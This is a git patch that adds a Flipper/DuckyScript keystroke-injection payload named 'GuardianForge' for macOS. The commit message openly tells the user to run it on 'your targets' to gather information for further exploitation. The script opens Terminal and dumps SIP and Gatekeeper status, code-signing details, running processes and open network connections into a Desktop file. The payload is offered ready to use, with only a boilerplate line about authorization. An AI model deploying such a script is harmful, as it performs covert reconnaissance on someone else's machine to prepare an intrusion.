From e9eb3f1156e037a2c22dde5cea5b39545c08a681 Mon Sep 17 00:00:00 2001 From: Narsty Date: Sun, 21 May 2023 15:39:48 -0500 Subject: [PATCH] Add files via upload Run this script on your targets MacOs to gain information to further exploit the system. When conducting security testing or penetration testing, it's crucial to follow legal and ethical guidelines, obtain proper authorization, and ensure that you are testing on systems you have permission to access and assess. --- RECON/GuardianForge.txt | 37 +++++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 RECON/GuardianForge.txt diff --git a/RECON/GuardianForge.txt b/RECON/GuardianForge.txt new file mode 100644 index 0000000..544ee7c --- /dev/null +++ b/RECON/GuardianForge.txt @@ -0,0 +1,37 @@ +REM Script for System Execution Testing +REM This script is designed to test system execution capabilities and security settings on macOS. +REM It performs a series of controlled executions to assess the system's behavior and identify any vulnerabilities. + +REM You can replace with th path of your flipper to save the data dump + + + + +REM Author: Narsty +REM Title: GuardianForge +REM Target: MacOS +REM Version: 1.0 +REM Category: Execution + +DELAY 1000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING csrutil status > ~/Desktop/security_info.txt && sleep 2 +ENTER +DELAY 2000 +STRING spctl --status >> ~/Desktop/security_info.txt && sleep 2 +ENTER +DELAY 2000 +STRING codesign -dv --verbose=4 /bin/bash >> ~/Desktop/security_info.txt && sleep 2 +ENTER +DELAY 2000 +STRING ps aux | grep -v "root\|_" >> ~/Desktop/security_info.txt && sleep 2 +ENTER +DELAY 2000 +STRING lsof -i >> ~/Desktop/security_info.txt && sleep 2 +ENTER +